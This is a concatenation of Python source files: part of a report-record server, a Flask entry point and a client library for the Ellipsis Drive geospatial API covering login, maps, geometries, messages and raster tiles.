if not os.path.exists(weights_file):
weights_file = None
sample = dict(worker_id=worker_id, desc=json.load(f), weights_file=weights_file)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
return records
def _start_save_report_thread(self):
_thread = Thread(target=_dump_report, args=(self, self.persistence,))
_thread.daemon = True
_thread.start()
def update_record(step_name=None, worker_id=None, **kwargs):
"""Update record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "request message missing step_name or worker id."}
if kwargs:
kwargs["step_name"] = step_name
kwargs["worker_id"] = worker_id
uid = "{}_{}".format(step_name, worker_id)
global _records_lock, _modified
with _records_lock:
_modified = True
records = ReportServer()._hist_records
if uid in records:
records[uid].load_dict(kwargs)
logging.debug("update record: {}".format(records[uid].to_dict()))
else:
records[uid] = ReportRecord().load_dict(kwargs)
logging.debug("new record: {}".format(records[uid].to_dict()))
return {"result": "success", "data": records[uid].to_dict()}
def get_record(step_name=None, worker_id=None, **kwargs):
"""Get record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "require message missing step_name or worker id."}
uid = "{}_{}".format(step_name, worker_id)
records = ReportServer()._hist_records
if uid in records:
data = records[uid].to_dict()
else:
data = ReportRecord().to_dict()
return {"result": "success", "data": data}
def _dump_report(report_server, persistence):
while True:
time.sleep(1)
global _records_lock, _modified
with _records_lock:
if not _modified:
continue
all_records = deepcopy(report_server.all_records)
_modified = False
try:
persistence.save_report(all_records)
# TODO
# persistence.pickle_report(report_server._hist_records, report_server.__instances__)
report_server.backup_output_path()
except Exception as e:
logging.warning(f"Failed to dump reports, message={str(e)}")
|
main.py
|
import threading
from __init__ import app, configuration
import database.database_connection as database
if database.connect_if_required():
database.database_engine.init_app(app)
database.database_engine.create_all()
def run_schedulers():
import time
import schedule
while True:
schedule.run_pending()
time.sleep(1)
threading.Thread(target=run_schedulers, daemon=True).start()
if __name__ == '__main__':
if configuration.web_ssl:
app.run(debug=configuration.debug_mode, host=configuration.web_host, port=configuration.web_port, ssl_context=(configuration.ssl_certfile, configuration.ssl_keyfile))
else:
app.run(debug=configuration.debug_mode, host=configuration.web_host, port=configuration.web_port)
|
__init__.py
|
#python3 setup.py sdist bdist_wheel
#twine upload --repository pypi dist/*
import pandas as pd
from PIL import Image
import geopandas as gpd
from pyproj import Proj, transform
import base64
import numpy as np
from io import BytesIO
import time
import requests
import rasterio
from datetime import datetime
import math
import tifffile
from shapely.geometry import Polygon
from rasterio.features import rasterize
from geopy.distance import geodesic
import json
#import cv2
import sys
import os
from rasterio.io import MemoryFile
from requests_toolbelt import MultipartEncoder
import warnings
import threading
__version__ = '1.2.15'
url = 'https://api.ellipsis-drive.com/v1'
s = requests.Session()
warnings.filterwarnings("ignore")
def logIn(username, password):
r =s.post(url + '/account/login/',
json = {'username':username, 'password':password} )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
token = r.json()
token = token['token']
token = 'Bearer ' + token
return(token)
def metadata(projectId, includeDeleted=False, token = None):
mapId = projectId
if token == None:
r = s.post(url + '/metadata',
json = {"mapId": mapId})
else:
r = s.post(url + '/metadata', headers = {"Authorization":token},
json = {"mapId": mapId, 'includeDeleted':includeDeleted})
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
return(r)
def getShapes(name= None, fuzzyMatch = False, favorite = None, access = ['subscribed', 'public', 'owned'], bounds=None, userId= None, hashtag = None, limit = 100, token = None):
body = {'access': access}
if str(type(name)) != str(type(None)):
body['name'] = name
body['nameFuzzy'] = True
if str(type(favorite)) != str(type(None)):
body['favorite'] = name
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(hashtag)) != str(type(None)):
body['hashtag'] = hashtag
if str(type(bounds)) != str(type(None)):
bounds = {'xMin':float(bounds['xMin']), 'xMax':float(bounds['xMax']), 'yMin':float(bounds['yMin']), 'yMax':float(bounds['yMax'])}
body['bounds'] = bounds
keepGoing = True
results = []
while keepGoing:
if token == None:
r = s.post(url + '/account/shapes', json = body )
else:
r = s.post(url + '/account/shapes', json = body,
headers = {"Authorization":token} )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
result = r.json()
body['pageStart'] = result['nextPageStart']
result = result['result']
if len(result) < 100:
keepGoing = False
results = results + result
if len(result) >= limit:
keepGoing = False
end = min(limit, len(result))
result = result[0:end]
return(results)
def getMaps(name= None, fuzzyMatch = False, access = ['subscribed', 'public', 'owned'], bounds = None, userId= None, favorite = None, resolutionRange=None, dateRange=None, hashtag = None, limit = 100, token = None):
body = {'access': access}
if str(type(name)) != str(type(None)):
body['name'] = name
body['nameFuzzy'] = fuzzyMatch
if str(type(favorite)) != str(type(None)):
body['favorite'] = favorite
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(dateRange)) != str(type(None)):
body['dateFrom'] = dateRange['dateFrom'].strftime('%Y-%m-%d %H:%M:%S')
body['dateTo'] = dateRange['dateTo'].strftime('%Y-%m-%d %H:%M:%S')
if str(type(resolutionRange)) != str(type(None)):
body['resolution'] = resolutionRange
if str(type(hashtag)) != str(type(None)):
body['hashtag'] = hashtag
if str(type(bounds)) != str(type(None)):
bounds = {'xMin':float(bounds['xMin']), 'xMax':float(bounds['xMax']), 'yMin':float(bounds['yMin']), 'yMax':float(bounds['yMax'])}
body['bounds'] = bounds
keepGoing = True
results = []
while keepGoing:
if token == None:
r = s.post(url + '/account/maps', json = body )
else:
r = s.post(url + '/account/maps', json = body,
headers = {"Authorization":token} )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
result = r.json()
body['pageStart'] = result['nextPageStart']
results = results + result['result']
result = result['result']
if len(result) < 100:
keepGoing = False
results = results + result
if len(result) >= limit:
keepGoing = False
end = min(limit, len(result))
result = result[0:end]
return(results)
def getBounds(projectId, timestamp = None, token = None ):
body = {"mapId": projectId}
if str(type(timestamp)) != str(type(None)):
body['timestamp'] = timestamp
else:
body['timestamp'] = 0
if token == None:
r = s.post(url + '/settings/projects/bounds',
json = body)
else:
r = s.post(url + '/settings/projects/bounds', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
r['id'] = 0
r['properties'] = {}
r = gpd.GeoDataFrame.from_features([r])
r = r.unary_union
return(r)
def geometryIds(shapeId, layerId, geometryIds, wait = 0, token = None):
body = {"mapId": shapeId, 'layerId':layerId, 'returnType':'all'}
ids_chunks = chunks( list(geometryIds))
sh = gpd.GeoDataFrame()
for chunk_ids in ids_chunks:
body['geometryIds'] = list(chunk_ids)
if token == None:
r = s.post(url + '/geometry/bounds',
json = body, timeout=10)
else:
r = s.post(url + '/geometry/get', headers = {"Authorization":token},
json = body, timeout=10)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
sh = sh.append(gpd.GeoDataFrame.from_features(r['result']['features']))
time.sleep(wait)
return(sh)
def geometryGet(shapeId, layerId, filters = None, limit = None, wait = 0, token = None):
body = {"mapId": shapeId, 'layerId':layerId}
if str(type(filters)) != str(type(None)):
try:
for i in np.arange(len(filters)):
if 'float' in str(type(filters[i]['key'])):
filters[i]['value'] = float(filters[i]['value'])
if 'bool' in str(type(filters[i]['key'])):
filters[i]['value'] = bool(filters[i]['value'])
if 'int' in str(type(filters[i]['key'])):
filters[i]['value'] = int(filters[i]['value'])
if filters[i]['key'] == 'creationDate':
filters[i]['value'] = filters[i]['value'].strftime('%Y-%m-%d %H:%M:%S')
body['propertyFilter'] = filters
except:
raise ValueError('filters must be an array with dictionaries. Each dictionary should have a property, key, operator and value')
body = json.dumps(body)
print(body)
body = json.loads(body)
body['returnType'] = 'all'
keepGoing = True
sh = gpd.GeoDataFrame()
while (keepGoing):
if str(type(limit)) != str(type(None)):
limit = min(3000, limit - sh.shape[0])
body['pageSize'] = limit
if token == None:
r = s.post(url + '/geometry/get',
json = body, timeout=10)
else:
r = s.post(url + '/geometry/get', headers = {"Authorization":token},
json = body, timeout=10)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
if len(r['result']['features']) < 3000 and not r['truncated']:
keepGoing = False
sh = sh.append(gpd.GeoDataFrame.from_features(r['result']['features']))
body['pageStart'] = r['nextPageStart']
time.sleep(wait)
if sh.shape[0]>0:
loadingBar(sh.shape[0],sh.shape[0])
sh.crs = {'init': 'epsg:4326'}
return(sh)
def geometryBounds(shapeId, layerId, xMin = None, xMax = None, yMin=None, yMax=None, filters=None, wait = 0, limit = None, token = None):
mapId = shapeId
body = {"mapId": mapId, 'layerId':layerId}
if str(type(xMin)) == str(type(None)):
xMin = -180
if str(type(xMax)) == str(type(None)):
xMax = 180
if str(type(yMin)) == str(type(None)):
yMin = -85
if str(type(yMax)) == str(type(None)):
yMax = 85
body['bounds'] = {'xMin': float(xMin) , 'xMax':float(xMax), 'yMin':float(yMin), 'yMax':float(yMax)}
if str(type(filters)) != str(type(None)):
try:
for i in np.arange(len(filters)):
if 'float' in str(type(filters[i]['key'])):
filters[i]['value'] = float(filters[i]['value'])
if 'bool' in str(type(filters[i]['key'])):
filters[i]['value'] = bool(filters[i]['value'])
if 'int' in str(type(filters[i]['key'])):
filters[i]['value'] = int(filters[i]['value'])
if filters[i]['key'] == 'creationDate':
filters[i]['value'] = filters[i]['value'].strftime('%Y-%m-%d %H:%M:%S')
body['propertyFilter'] = filters
except:
raise ValueError('filters must be an array with dictionaries. Each dictionary should have a property, key, operator and value')
body = json.dumps(body)
body = json.loads(body)
body['returnType'] = 'all'
keepGoing = True
sh = gpd.GeoDataFrame()
while (keepGoing):
if str(type(limit)) != str(type(None)):
limit = min(3000, limit - sh.shape[0])
body['pageSize'] = limit
if token == None:
r = s.post(url + '/geometry/bounds',
json = body, timeout=10)
else:
r = s.post(url + '/geometry/bounds', headers = {"Authorization":token},
json = body, timeout=10)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
if len(r['result']['features']) < 3000 and not r['truncated']:
keepGoing = False
sh = sh.append(gpd.GeoDataFrame.from_features(r['result']['features']))
body['pageStart'] = r['nextPageStart']
time.sleep(wait)
if sh.shape[0]>0:
loadingBar(sh.shape[0],sh.shape[0])
sh.crs = {'init': 'epsg:4326'}
return(sh)
def geometryVersions(shapeId, layerId, geometryId, token = None):
mapId = shapeId
body = {"mapId": mapId, "layerId":layerId, 'geometryId':geometryId, 'returnType':'all'}
if token == None:
r = s.post(url + '/geometry/versions',
json = body)
else:
r = s.post(url + '/geometry/versions', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()['result']
sh = gpd.GeoDataFrame()
for v in r:
sh_sub = gpd.GeoDataFrame({'geometry':[v['feature']]})
sh_sub['editUser'] = v['editUser']
sh_sub['editDate'] = v['editDate']
sh = sh.append(sh_sub)
sh.crs = {'init': 'epsg:4326'}
return(sh)
def geometryDelete(shapeId, layerId, geometryIds, token, revert= False):
body = {"mapId": shapeId, "layerId":layerId , 'geometryIds': list(geometryIds), 'rever':revert}
r= s.post(url + '/geometry/delete', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def geometryEdit(shapeId, layerId, geometryIds, token, features = None, zoomlevels = None):
if str(type(zoomlevels)) != str(type(None)) and str(type(features)) != str(type(None)):
raise ValueError('you need to edit either features or zoomlevels')
mapId = shapeId
if str(type(features)) != str(type(None)):
features = features.copy()
if 'id' in features.columns:
del features['id']
if 'userId' in features.columns:
del features['userId']
if 'attribution' in features.columns:
del features['attribution']
if not str(type(features)) == "<class 'geopandas.geodataframe.GeoDataFrame'>":
raise ValueError('features must be of type geopandas dataframe')
features = features.to_crs({'init': 'epsg:4326'})
if str(type(zoomlevels)) != str(type(None)):
zoomlevels = [int(z) for z in zoomlevels]
indices = chunks(np.arange(len(geometryIds)),1000)
i=0
for i in np.arange(len(indices)):
indices_sub = indices[i]
geometryIds_sub = geometryIds[indices_sub]
if str(type(features)) != str(type(None)):
features_sub = features.iloc[indices_sub]
features_sub =features_sub.to_json(na='drop')
features_sub = json.loads(features_sub)
if str(type(zoomlevels)) != str(type(None)) and str(type(features)) != str(type(None)):
changes = [{'geometryId':x[0] , 'newProperties':x[1]['properties'], 'newGeometry':x[1]['geometry'], 'newZoomlevels':zoomlevels} for x in zip(geometryIds_sub, features_sub['features'])]
elif str(type(zoomlevels)) != str(type(None)) and str(type(features)) == str(type(None)):
changes = [{'geometryId':geometryId, 'newZoomlevels':zoomlevels} for geometryId in geometryIds]
else:
changes = [{'geometryId':x[0] , 'newProperties':x[1]['properties'], 'newGeometry':x[1]['geometry']} for x in zip(geometryIds_sub, features_sub['features'])]
body = {"mapId": mapId, "layerId":layerId, 'changes':changes}
retried = 0
while retried <= 20:
try:
r = s.post(url + '/geometry/edit', headers = {"Authorization":token},
json = body )
retried = 21
except Exception as e:
if retried == 20:
raise ValueError(e)
retried = retried +1
time.sleep(1)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
loadingBar(i*1000 + len(indices_sub),len(geometryIds))
def geometryChangelog(shapeId, layerId, limit = 100, userId = None, pageStart = None, actions = ['add', 'delete', 'recover', 'move'], token = None):
changes = []
keepGoing = True
while keepGoing:
pageSize = min(100, limit - len(changes))
body = {'mapId':shapeId, 'layerId':layerId, 'pageSize':pageSize, 'actions':list(actions)}
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(pageStart)) != str(type(None)):
body['pageStart'] = pageStart
if token ==None:
r = s.post(url + '/geometry/changeLog',
json = body )
else:
r = s.post(url + '/geometry/changeLog', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
pageStart = r['nextPageStart']
r = r['result']
changes = changes + r
if len(changes) >= limit or str(type(pageStart)) == str(type(None)):
break
return({'changes':changes, 'pageStart':pageStart})
def geometryAdd(shapeId, layerId, features, token, zoomlevels=None):
mapId = shapeId
if not str(type(features)) == "<class 'geopandas.geodataframe.GeoDataFrame'>":
raise ValueError('features must be of type geopandas dataframe')
if str(type(features.crs)) == str(type(None)) and min(features.bounds['minx']) > -180 and max(features.bounds['maxx']) < 180 and min(features.bounds['miny']) > -90 and max(features.bounds['maxy']) < 90:
print('assuming WGS84 coordinates')
elif str(type(features.crs)) == str(type(None)):
raise ValueError('Please provide CRS for the geopandas dataframe or translate to WGS84 coordinates')
else:
features = features.to_crs({'init': 'epsg:4326'})
if str(type(None)) != str(type(zoomlevels)):
zoomlevels = [int(z) for z in zoomlevels]
firstTime = metadata(projectId = mapId, token = token)['geometryLayers']
firstTime = [x for x in firstTime if x['id'] == layerId]
if len(firstTime)==0:
raise ValueError('layer does not exist')
firstTime = len(firstTime[0]['properties']) ==0
if firstTime:
print('no properties known for this layer adding them automatically')
columns = features.columns
columns = [c for c in columns if c != 'geometry']
for c in columns:
if 'int' in str(features.dtypes[c]):
propertyType = 'integer'
features[c] = [ int(d) if not np.isnan(d) and d != None else np.nan for d in features[c].values ]
elif 'float' in str(features.dtypes[c]):
propertyType = 'float'
features[c] = [ float(d) if not np.isnan(d) and d != None else np.nan for d in features[c].values ]
elif 'bool' in str(features.dtypes[c]):
propertyType = 'boolean'
features[c] = [ bool(d) if not np.isnan(d) and d != None else np.nan for d in features[c].values ]
elif 'datetime' in str(features.dtypes[c]):
propertyType = 'datetime'
features[c] = [ d.strftime('%Y-%m-%d %H:%M:%S.%f')[:-3] for d in features[c].values ]
else:
propertyType = 'string'
features[c] = [ str(d) if d != None else np.nan for d in features[c].values ]
###date
addProperty(shapeId = mapId, layerId =layerId, propertyName = c, propertyType = propertyType, token = token)
indices = chunks(np.arange(features.shape[0]))
#add properties manually
addedIds = []
for i in np.arange(len(indices)):
indices_sub = indices[i]
features_sub = features.iloc[indices_sub]
features_sub =features_sub.to_json(na='drop')
features_sub = json.loads(features_sub)
#float to int
body = {"mapId": mapId, "layerId":layerId, "features":features_sub['features']}
if str(type(None)) != str(type(zoomlevels)):
body['zoomLevels'] = zoomlevels
retried = 0
while retried <= 20:
try:
r = s.post(url + '/geometry/add', headers = {"Authorization":token},
json = body )
retried = 21
except Exception as e:
if retried == 20:
raise ValueError(e)
retried = retried +1
time.sleep(1)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
addedIds = addedIds + r.json()
loadingBar(i*3000 + len(indices_sub),features.shape[0])
i = i+1
return(addedIds)
def messageGet(shapeId, layerId, userId= None, messageIds =None, geometryIds=None, limit = None, deleted=False, token = None):
body={'mapId':shapeId, 'layerId':layerId, 'deleted':deleted, 'returnType':'all'}
if str(type(userId)) != str(type(None)):
body['userId']=userId
if str(type(geometryIds)) != str(type(None)):
body['geometryIds']= list(geometryIds)
keepGoing = True
messages = []
while(keepGoing):
if str(type(limit)) == str(type(None)):
body['pageSize'] = 100
else:
body['pageSize'] = min(100, limit - len(messages))
if token == None:
r = s.post(url + '/message/get',
json = body )
else:
r = s.post(url + '/message/get', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
body['pageStart']=r['nextPageStart']
messages = messages + r['result']
if str(type(limit)) == str(type(None)):
keepGoing = str(type(r['nextPageStart'])) != str(type(None))
else:
keepGoing = len(messages) < limit or str(type(r['nextPageStart'])) != str(type(None))
loadingBar(len(messages), len(messages))
return(messages)
def messageAdd(shapeId, layerId, geometryId, token, replyTo = None, message = None, private= None, image=None, lon=None, lat=None):
mapId = shapeId
body = {'mapId':mapId, 'layerId':layerId, 'geometryId':geometryId}
if str(type(lon)) != "<class 'NoneType'>":
lon = float(lon)
if str(type(lat)) != "<class 'NoneType'>":
lat = float(lat)
if str(type(replyTo)) != "<class 'NoneType'>":
body['replyTo'] = replyTo
if str(type(message)) != "<class 'NoneType'>":
body['text'] = message
if str(type(private)) != "<class 'NoneType'>":
body['private'] = private
if str(type(image)) != "<class 'NoneType'>":
image = Image.fromarray(image.astype('uint8'))
buffered = BytesIO()
image.save(buffered, format="JPEG")
img_str = str(base64.b64encode(buffered.getvalue()))
img_str = 'data:image/jpeg;base64,' + img_str[2:-1]
body['image'] = img_str
if str(type(lon)) != "<class 'NoneType'>":
body['x'] = lon
if str(type(lat)) != "<class 'NoneType'>":
body['y'] = lat
r = s.post(url + '/message/add', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
messageId = r.json()['id']
return({'id':messageId})
def messageDelete(shapeId, layerId, messageId, token):
mapId = shapeId
body = {'mapId':mapId, 'layerId':layerId, 'messageId':messageId}
r = s.post(url + '/message/delete', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def messageImage(shapeId, layerId, messageId, token = None):
mapId = shapeId
body = {'mapId':mapId, 'layerId':layerId, 'messageId':messageId}
if token ==None:
r = s.post(url + '/message/image',
json = body )
else:
r = s.post(url + '/message/image', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
try:
im = Image.open(BytesIO(r.content))
except:
raise ValueError('No image or invalid image in geoMessage')
return(im)
def rasterAggregated(mapId, timestamps, geometry, approximate = True, token = None):
sh = gpd.GeoDataFrame({'geometry':[geometry]})
geometry =sh.to_json(na='drop')
geometry = json.loads(geometry)
geometry = geometry['features'][0]['geometry']
timestamps = list(timestamps)
body = {'mapId':mapId, 'timestamps':timestamps, 'geometry':geometry, 'approximate':approximate}
if token ==None:
r = s.post(url + '/raster/aggregated',
json = body )
else:
r = s.post(url + '/raster/aggregated', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def rasterRaw(mapId, timestamp, xMin= None,xMax= None,yMin=None, yMax=None, zoom = None, num_bands = None, bounds=None, downsample = False, width = None, height = None, threads = 1, token = None):
dtype = 'float32'
if str(type(bounds)) != str(type(None)):
xMin,yMin,xMax,yMax = bounds.bounds
elif str(type(xMin)) == "<class 'NoneType'>" or str(type(xMax)) == "<class 'NoneType'>" or str(type(yMin)) == "<class 'NoneType'>" or str(type(yMax)) == "<class 'NoneType'>" :
raise ValueError('Either xMin, xMax, yMin and yMax or bounds are required')
xMin = float(xMin)
xMax = float(xMax)
yMin = float(yMin)
yMax = float(yMax)
xMinWeb,yMinWeb = transform(Proj(init='epsg:4326'), Proj(init='epsg:3857'), xMin, yMin)
xMaxWeb,yMaxWeb = transform(Proj(init='epsg:4326'), Proj(init='epsg:3857'), xMax, yMax)
timestamp = int(timestamp)
token_inurl = ''
if str(type(token)) != str(type(None)):
token_inurl = '?token=' + token.replace('Bearer ', '')
if downsample:
if str(type(width)) == str(type(None)) or str(type(height)) == str(type(None)):
raise ValueError('if downsample is true, width and height are required')
bbox = {'xMin':xMin, 'xMax':xMax, 'yMin':yMin , 'yMax':yMax}
body = {'mapId':mapId, 'timestamp' : timestamp, 'mapId':mapId, 'bounds':bbox, 'width':width, 'height':height}
print(body)
if str(type(token)) == str(type(None)):
r = s.post(url + '/raster/raw',
json = body )
else:
r = s.post(url + '/raster/raw', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
else:
r_total = tifffile.imread(BytesIO(r.content))
r_total = np.transpose(r_total, [2,0,1])
else:
if str(type(num_bands)) == str(type(None)):
bands = metadata(mapId)['bands']
num_bands = len(bands)
if str(type(zoom)) == str(type(None)):
timestamps = metadata(mapId, token = token)['timestamps']
all_timestamps = [item["timestamp"] for item in timestamps]
if not timestamp in all_timestamps:
raise ValueError('given timestamp does not exist')
zoom = next(item for item in timestamps if item["timestamp"] == timestamp)['zoom']
min_x_osm_precise = (xMin +180 ) * 2**zoom / 360
max_x_osm_precise = (xMax +180 ) * 2**zoom / 360
max_y_osm_precise = 2**zoom / (2* math.pi) * ( math.pi - math.log( math.tan(math.pi / 4 + yMin/360 * math.pi ) ) )
min_y_osm_precise = 2**zoom / (2* math.pi) * ( math.pi - math.log( math.tan(math.pi / 4 + yMax/360 * math.pi ) ) )
min_x_osm = math.floor(min_x_osm_precise )
max_x_osm = math.floor( max_x_osm_precise)
max_y_osm = math.floor( max_y_osm_precise)
min_y_osm = math.floor( min_y_osm_precise)
x_tiles = np.arange(min_x_osm, max_x_osm+1)
y_tiles = np.arange(min_y_osm, max_y_osm +1)
r_total = np.zeros((256*(max_y_osm - min_y_osm + 1) ,256*(max_x_osm - min_x_osm + 1),num_bands), dtype = dtype)
tiles = []
for tileY in y_tiles:
for tileX in x_tiles:
tiles = tiles + [(tileX, tileY)]
def subTiles(tiles):
N = 0
for tile in tiles:
tileX = tile[0]
tileY = tile[1]
x_index = tileX - min_x_osm
y_index = tileY - min_y_osm
url_req = url + '/tileService/' + mapId + '/' + str(timestamp) + '/data/' + str(zoom) + '/' + str(tileX) + '/' + str(tileY) + token_inurl
r = s.get(url_req , timeout = 10 )
if int(str(r).split('[')[1].split(']')[0]) == 403:
raise ValueError('insufficient access')
if int(str(r).split('[')[1].split(']')[0]) != 200:
r = np.zeros((num_bands,256,256))
else:
r = tifffile.imread(BytesIO(r.content))
r = np.transpose(r, [1,2,0])
r_total[y_index*256:(y_index+1)*256,x_index*256:(x_index+1)*256, : ] = r
loadingBar(N, len(tiles))
N = N + 1
size = math.floor(len(tiles)/threads) + 1
tiles_chunks = chunks(tiles, size)
prs = []
for tiles in tiles_chunks:
pr = threading.Thread(target = subTiles, args =(tiles,), daemon=True)
pr.start()
prs = prs + [pr]
for pr in prs:
pr.join()
min_x_index = int(round((min_x_osm_precise - min_x_osm)*256))
max_x_index = max(int(round((max_x_osm_precise- min_x_osm)*256)), min_x_index + 1 )
min_y_index = int(round((min_y_osm_precise - min_y_osm)*256))
max_y_index = max(int(round((max_y_osm_precise- min_y_osm)*256)), min_y_index + 1)
r_total = r_total[min_y_index:max_y_index,min_x_index:max_x_index,:]
if str(type(bounds)) != str(type(None)):
trans = rasterio.transform.from_bounds(xMinWeb, yMinWeb, xMaxWeb, yMaxWeb, r_total.shape[1], r_total.shape[0])
shape = gpd.GeoDataFrame({'geometry':[bounds]})
shape.crs = {'init': 'epsg:4326'}
shape = shape.to_crs({'init': 'epsg:3857'})
raster_shape = rasterize( shapes = [ (shape['geometry'].values[m], 1) for m in np.arange(shape.shape[0]) ] , fill = 0, transform = trans, out_shape = (r_total.shape[0], r_total.shape[1]), all_touched = True )
r_total[:,:,-1] = np.minimum(r_total[:,:,-1], raster_shape)
return(r_total)
def rasterVisual(mapId, timestamp, layerId, xMin= None,xMax= None,yMin=None, yMax=None, bounds=None, downsample = False, width = None, height=None, threads = 1, token = None):
dtype = 'uint8'
if str(type(bounds)) != str(type(None)):
xMin,yMin,xMax,yMax = bounds.bounds
elif str(type(xMin)) == "<class 'NoneType'>" or str(type(xMax)) == "<class 'NoneType'>" or str(type(yMin)) == "<class 'NoneType'>" or str(type(yMax)) == "<class 'NoneType'>" :
raise ValueError('Either xMin, xMax, yMin and yMax or bounds are required')
xMin = float(xMin)
xMax = float(xMax)
yMin = float(yMin)
yMax = float(yMax)
xMinWeb,yMinWeb = transform(Proj(init='epsg:4326'), Proj(init='epsg:3857'), xMin, yMin)
xMaxWeb,yMaxWeb = transform(Proj(init='epsg:4326'), Proj(init='epsg:3857'), xMax, yMax)
timestamp = int(timestamp)
token_inurl = ''
if token != None:
token_inurl = '?token=' + token.replace('Bearer ', '')
if downsample:
if str(type(width)) == str(type(None)) or str(type(height)) == str(type(None)):
raise ValueError('if downsample is true, width and height are required')
bbox = {'xMin':xMin, 'xMax':xMax, 'yMin':yMin , 'yMax':yMax}
body = {'mapId':mapId, 'timestamp' : timestamp,'layerId':layerId, 'mapId':mapId, 'bounds':bbox, 'width':width, 'height':height}
if str(type(token)) == str(type(None)):
r = s.post(url + '/raster/bounds',
json = body )
else:
r = s.post(url + '/raster/bounds', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
else:
r_total = np.array(Image.open(BytesIO(r.content)), dtype = 'uint8')
else:
timestamps = metadata(mapId, token = token)['timestamps']
zoom = next(item for item in timestamps if item["timestamp"] == timestamp)['zoom']
min_x_osm_precise = (xMin +180 ) * 2**zoom / 360
max_x_osm_precise = (xMax +180 ) * 2**zoom / 360
max_y_osm_precise = 2**zoom / (2* math.pi) * ( math.pi - math.log( math.tan(math.pi / 4 + yMin/360 * math.pi ) ) )
min_y_osm_precise = 2**zoom / (2* math.pi) * ( math.pi - math.log( math.tan(math.pi / 4 + yMax/360 * math.pi ) ) )
min_x_osm = math.floor(min_x_osm_precise )
max_x_osm = math.floor( max_x_osm_precise)
max_y_osm = math.floor( max_y_osm_precise)
min_y_osm = math.floor( min_y_osm_precise)
x_tiles = np.arange(min_x_osm, max_x_osm+1)
y_tiles = np.arange(min_y_osm, max_y_osm +1)
tiles = []
for tileY in y_tiles:
for tileX in x_tiles:
tiles = tiles + [(tileX,tileY)]
def subTiles(tiles):
N=0
for tile in tiles:
tileX = tile[0]
tileY = tile[1]
x_index = tileX - min_x_osm
y_index = tileY - min_y_osm
r = s.get(url + '/tileService/' + mapId + '/' + str(timestamp) + '/' + layerId + '/' + str(zoom) + '/' + str(tileX) + '/' + str(tileY) + token_inurl ,
timeout = 10 )
if int(str(r).split('[')[1].split(']')[0]) != 200:
r = np.zeros((256,256,4))
else:
r = np.array(Image.open(BytesIO(r.content)), dtype = 'uint8')
r_total[y_index*256:(y_index+1)*256,x_index*256:(x_index+1)*256, : ] = r
loadingBar(N, len(tiles))
N = N+1
r_total = np.zeros((256*(max_y_osm - min_y_osm + 1) ,256*(max_x_osm - min_x_osm + 1),4), dtype = dtype)
size = math.floor(len(tiles)/threads) + 1
tiles_chunks = chunks(tiles, size)
prs = []
for tiles in tiles_chunks:
pr = threading.Thread(target = subTiles, args =(tiles,), daemon=True)
pr.start()
prs = prs + [pr]
for pr in prs:
pr.join()
min_x_index = int(round((min_x_osm_precise - min_x_osm)*256))
max_x_index = int(round((max_x_osm_precise- min_x_osm)*256))
min_y_index = int(round((min_y_osm_precise - min_y_osm)*256))
max_y_index = int(round((max_y_osm_precise- min_y_osm)*256))
r_total = r_total[min_y_index:max_y_index,min_x_index:max_x_index,:]
if str(type(bounds)) != str(type(None)):
trans = rasterio.transform.from_bounds(xMinWeb, yMinWeb, xMaxWeb, yMaxWeb, r_total.shape[1], r_total.shape[0])
shape = gpd.GeoDataFrame({'geometry':[bounds]})
shape.crs = {'init': 'epsg:4326'}
shape = shape.to_crs({'init': 'epsg:3857'})
raster_shape = rasterize( shapes = [ (shape['geometry'].values[m], 1) for m in np.arange(shape.shape[0]) ] , fill = 0, transform = trans, out_shape = (r_total.shape[0], r_total.shape[1]), all_touched = True )
r_total[:,:,-1] = np.minimum(r_total[:,:,-1], raster_shape)
r_total = r_total.astype('uint8')
r_total = Image.fromarray(r_total)
return(r_total)
def seriesAdd(shapeId, layerId, geometryId, data, token, includeDatetime = True):
data = data.copy()
mapId = shapeId
if not 'datetime' in data.columns and includeDatetime:
raise ValueError('Dataframe has no datetime column. In case you wish to upload data without a date and time use includeDatetime = False. In this case the server will add the current datetime as datetime')
if 'datetime' in data.columns:
includeDatetime = True
if str(data['datetime'].dtypes) == 'datetime64[ns]':
data['datetime'] = data['datetime'].dt.strftime('%Y-%m-%d %H:%M:%S')
dates = list(data['datetime'])
del data['datetime']
else:
raise ValueError('datetime column must be of type datetime')
for c in data.columns:
data[c] = data[c].astype(float)
values = []
